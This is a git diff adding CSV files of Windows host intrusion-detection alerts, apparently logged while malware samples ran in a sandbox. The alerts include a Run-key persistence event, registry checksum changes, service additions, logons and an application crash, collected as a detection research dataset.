C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:19:09.038"",""processGuid"":""{df9fc3d3-d147-5ec7-0000-00100b611500}"",""processId"":""3980"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\76F2C2FB-2630A877"",""details"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe""}}}", +"May 22, 2020 @ 18:05:52.647",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 18:05:52.584",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 18:05:43.475",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '32d67903586d935a6926ee021a657f19' +New md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: '1ad1aa9999e1eafd661aa0303b51307310f5088f' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +", +"May 22, 2020 @ 18:05:43.460",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '8999bd4a5ea0eeed0dd920d7e30ffee2' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: 'a08f01e683a5864c95f899a000531cacef39c721' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +", diff --git a/data/MW_16_NIDS.csv b/data/MW_16_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_16_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_17_HIDS_1.csv b/data/MW_17_HIDS_1.csv new file mode 100644 index 0000000..8304c83 --- /dev/null +++ b/data/MW_17_HIDS_1.csv @@ -0,0 +1,238 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 17:02:24.202",9,"Windows Application error event", +"Apr 4, 2020 @ 17:06:17.681",9,"Windows Application error event", +"Apr 4, 2020 @ 17:03:47.969",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '946393bfe882a9af45fb233c75a64496' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : 'e87fd396748831209129d52a5ac2ebc0c821c9d8' +" +"Apr 4, 2020 @ 17:04:48.897",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '0a11a072fc5a95522aa8ca6087115073' +New md5sum is : '728627011eedd28411cf4e1f2a30d1ca' +Old sha1sum was: '7afc9a8039fc019833a674d4b24d2aac0c3bec0f' +New sha1sum is : '26576187b3bbee39309e7ebe95de85749ea7b9d2' +" +"Apr 4, 2020 @ 17:04:48.943",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '159e8160718d62e0183fb83f9d974bce' +New md5sum is : '90c308d6ba777694468a55ad137e03d6' +Old sha1sum was: '3c5d2bc914ef5d1c99fc4a118a7d0f5ee41dccb1' +New sha1sum is : '47f7098f09867fd73bd98d11049335e571a48671' +" +"Apr 4, 2020 @ 17:04:49.999",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '2d51a39060048326323e1170645b4e61' +New md5sum is : 'c75822ec611acbcbb269b78583607046' +Old sha1sum was: 'cc587367c23587922b1775a491012b83ee3fa30e' +New sha1sum is : '06e1b1660dbc4a0487198e2d7ea54076bc096408' +" +"Apr 4, 2020 @ 17:05:03.470",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 4, 2020 @ 17:05:03.503",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : 'f6e88f38b160d22d89350b94cb5237e7' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : '37515d7889fae105d340a0ec0d16094dd8174d5b' +" +"Apr 4, 2020 @ 17:07:04.828",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 4, 2020 @ 17:08:51.327",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"Apr 4, 2020 @ 17:09:28.576",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : '2c49cf8caed016631a24bd71e3e9e80c' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '40f0de11aa2ee63049f0069b6e9fa76b0dc4b8b7' +" +"Apr 4, 2020 @ 17:09:28.624",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '946393bfe882a9af45fb233c75a64496' +New md5sum is : '41a95f1abf697d2d101c1c56ccb36347' +Old sha1sum was: 'e87fd396748831209129d52a5ac2ebc0c821c9d8' +New sha1sum is : 'f9477f92a32da990982e1810a58007342e65d0dd' +" +"Apr 4, 2020 @ 17:09:28.654",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : '08bb215e21ea2723bc26eeae658301e9' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : 'e76cceac6aa9a9a5411294872c62009b4702f12e' +" +"Apr 4, 2020 @ 17:09:33.701",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '47fd90673e4149c8c1bbb085f5763125' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '0d17eb3a2aeb55b8fd5633d8cbab3240e0899dbb' +" +"Apr 4, 2020 @ 17:09:36.375",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '98ec8052b0f64098916782bd320b3e94' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : '56a7eb561d718adade5e96b03b3eb4989b7c6011' +" +"Apr 4, 2020 @ 17:09:42.310",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : '173797c10aa556531982a7bfc8d3ab55' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : 'c268280af8a808346c2f86c661fabc20081c143f' +" +"Apr 4, 2020 @ 17:09:50.436",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 4, 2020 @ 17:09:51.545",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '58430ce9153e479a3355075ec077b970' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'c0d3efa5f497dd52fd36e4dc2992013d18131ad3' +" +"Apr 4, 2020 @ 17:09:52.248",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : '6c149849ed190eb47ba853655e554659' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : 'bd5b8d2f517c52a6faad39b6fdf34f1c23754d17' +" +"Apr 4, 2020 @ 17:09:54.810",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '58430ce9153e479a3355075ec077b970' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'c0d3efa5f497dd52fd36e4dc2992013d18131ad3' +" +"Apr 4, 2020 @ 17:09:56.217",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '1f8b87e40befb4b91987c8969454b10b' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : 'fe046c62a0c41e693d21fd0cd11c2f3e4edd8d1b' +" +"Apr 4, 2020 @ 17:10:01.108",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'd05d6647ae49bb2cbfc124d9f72cec8f' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : 'e179895d565ef23917dd2d5304a57defb5c2a327' +" +"Apr 4, 2020 @ 17:10:02.563",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : 'ebdfe878b08bab0d922ec0c0f7b8ec81' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : 'edd2f7a68434d2b48a1a28e38658484e8f04688c' +" +"Apr 4, 2020 @ 17:10:02.811",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '56e9f0a7add3da7f007b812f71fed075' +New md5sum is : '1e6e38e0129cb1178036ce2d2de63896' +Old sha1sum was: 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +New sha1sum is : 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +" +"Apr 4, 2020 @ 17:10:04.092",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '58430ce9153e479a3355075ec077b970' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'c0d3efa5f497dd52fd36e4dc2992013d18131ad3' +" +"Apr 4, 2020 @ 17:07:01.679",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 17:07:01.741",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 17:07:49.217",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 17:07:51.032",5,"Windows audit failure event", +"Apr 4, 2020 @ 17:08:00.574",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 17:09:24.341",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:24.359",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:28.951",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:28.967",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:29.779",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:29.795",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 17:09:29.810",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 17:09:29.826",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 17:09:29.857",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 17:09:29.874",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 17:09:29.904",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:31.998",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:32.014",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:32.108",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:32.124",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:32.295",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:32.326",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:33.858",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:33.873",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:34.045",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:34.076",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:34.591",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:34.608",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:34.873",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:34.889",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:34.967",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:34.983",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:10:00.967",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:10:00.984",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2aaa9\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 17:10:01.002",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2aaa9' was added. +" +"Apr 4, 2020 @ 17:10:06.857",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:10:06.873",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:10:08.826",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:10:08.843",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:10:09.327",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:10:09.343",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:06:18.162",4,"Summary event of the report's signatures", +"Apr 4, 2020 @ 17:04:27.685",3,"Windows Logon Success", +"Apr 4, 2020 @ 17:04:37.241",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 17:06:17.740",3,"Windows Logon Success", +"Apr 4, 2020 @ 17:07:47.674",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 4, 2020 @ 17:07:49.692",3,"Windows Logon Success", +"Apr 4, 2020 @ 17:07:52.516",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 17:07:52.593",3,"The database engine attached a database", +"Apr 4, 2020 @ 17:07:52.763",3,"The Windows Search Service started", +"Apr 4, 2020 @ 17:07:53.152",3,"Windows Logon Success", +"Apr 4, 2020 @ 17:08:07.749",3,"Windows Logon Success", +"Apr 4, 2020 @ 17:08:08.715",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 17:08:08.731",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 17:08:08.762",3,"Windows User Logoff", +"Apr 4, 2020 @ 17:08:08.778",3,"Windows User Logoff", +"Apr 4, 2020 @ 17:08:29.810",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 17:09:08.919",3,"Windows Logon Success", +"Apr 4, 2020 @ 17:09:46.492",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 17:09:47.296",3,"Windows Logon Success", +"Apr 4, 2020 @ 17:09:49.218",3,"Windows Logon Success", diff --git a/data/MW_17_HIDS_2.csv b/data/MW_17_HIDS_2.csv new file mode 100644 index 0000000..6332bf5 --- /dev/null +++ b/data/MW_17_HIDS_2.csv @@ -0,0 +1,210 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 26, 2020 @ 09:58:44.824",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 09:58:44.810",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 09:58:21.607",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '302567d0e9b6bb461f19aa9d78f76a6c' +New md5sum is : '895df8cc5739efcdc5c8fe13b2771ee6' +Old sha1sum was: 'b504dec9dc3bf11d19b065debc90d46aa7acd1b6' +New sha1sum is : '7ad0adbefe76be7d2f1708306b6e924bff43921d' +", +"Apr 26, 2020 @ 09:58:21.592",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '90d8a3098aa7762a2499aa27705ed40c' +New md5sum is : '053e1e0333f95face38eae3da5f4dae5' +Old sha1sum was: 'c41442ce5f1fe0f2db713a0f2894dc530f721504' +New sha1sum is : '59809a07a561b359699e84280b2de1c11eb7ed92' +", +"Apr 26, 2020 @ 09:58:15.008",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef' +New md5sum is : '682d23e380b3858be2cde141ecd915b6' +Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f' +New sha1sum is : 'c127e2d2a6906e2591f30ce51505eb1db95ea99a' +", +"Apr 26, 2020 @ 09:58:10.073",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SmsRouter\State\Registration\Map' checksum changed. +Old md5sum was: 'f725bdba3c624ef1211452f438569838' +New md5sum is : 'a3c20e4136219d3eef2191a27f3f2145' +Old sha1sum was: '76d6ea0f40d643341bc4517a2d1b043f15ea0c6b' +New sha1sum is : 'f4f8158f74f78ded6fde0eebbb72a617e2aa9fb8' +", +"Apr 26, 2020 @ 09:58:10.058",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SmsRouter\State\Registration\Ids\{11C6734A-8F7B-4A5E-B26E-BDB14A32613D}' was added. +", +"Apr 26, 2020 @ 09:58:08.459",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '06f3d2f39343f57d32dd262e225aae84' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : 'cc04983290ed793a09187d5412932856395b581c' +", +"Apr 26, 2020 @ 09:57:35.920",4,"Summary event of the report's signatures",,"""Fault bucket 2248426720713588459, type 1 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: program17.exe +P2: 0.0.0.0 +P3: 5e5b84f7 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 832e7bce +P7: c0000005 +P8: 00063cb3 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB154.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB349.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3D6.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB413.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB452.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_program17.exe_b8355ffce62437e56ebb4421561b73589124a3_d2bf1580_b8884a20-bc96-434c-9c37-f795e52477c3 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 0eac7a5f-b2f5-403f-ae2b-0162b07c63f7 +Report Status: 268435456 +Hashed bucket: 63bbee492b7abb4bef34043097a13eeb +Cab Guid: 0""" +"Apr 26, 2020 @ 09:57:30.964",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 09:57:30.442",9,"Windows Application error event",,"""Faulting application name: program17.exe, version: 0.0.0.0, time stamp: 0x5e5b84f7 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x832e7bce +Exception code: 0xc0000005 +Fault offset: 0x00063cb3 +Faulting process id: 0x1674 +Faulting application start time: 0x01d60cd73f44bf48 +Faulting application path: C:\Users\John Williams\Downloads\program17.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 0eac7a5f-b2f5-403f-ae2b-0162b07c63f7 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 09:57:15.175",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'e415cd732af76fc8e2f6f97c4e6c5f3c' +New md5sum is : '3d31da889e8deb44149f83121f6c6101' +Old sha1sum was: '8450855442dc0dae778f9ab1823823bbe8029aae' +New sha1sum is : '5515d7c6eec4936ffb6265e9458e59e3d94f97ed' +", +"Apr 26, 2020 @ 09:57:15.138",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' 